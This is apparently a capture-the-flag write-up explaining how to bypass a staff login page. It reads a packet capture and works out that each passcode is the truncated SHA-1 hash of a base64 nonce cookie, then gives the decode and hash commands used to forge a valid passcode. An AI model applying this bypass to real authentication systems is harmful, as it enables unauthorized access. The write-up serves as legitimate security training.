Tags: web pcap hash cookies
> People seem to have some doohickey that lets them login with a code...
Again, we have the same PCAP.
There are 4 instances, where a POST request is sent to `/staff.html` with a `passcode` using the following values:
5004f47a 01c7aeb1 097b3acf 54f03ae2
Unfortunately, just replaying those values causes an error message, even if the `WifiKey nonce` cookie is set like in the capture.
One notices, that in the browser an additional cookie called `WifiKey alg` (with a value of `SHA1`) is set, which is not present in the capture.
Analysing the package from the capture which used `WifiKey nonce=MjAyMC0wNC0wOCAxNzowMw==` and the passcode `097b3acf`, we can decode the nonce and findo out how the passcode is created:
echo "MjAyMC0wNC0wOCAxNzowMw=="|base64 -d
echo -n "MjAyMC0wNC0wOCAxNzowMw=="|sha1sum
So all we gotta do is open the webpage, grep the nonce we retrieve, hash it with SHA-1 and send the first 8 characters as the passcode. As long as we do this within one minute, we get the flag: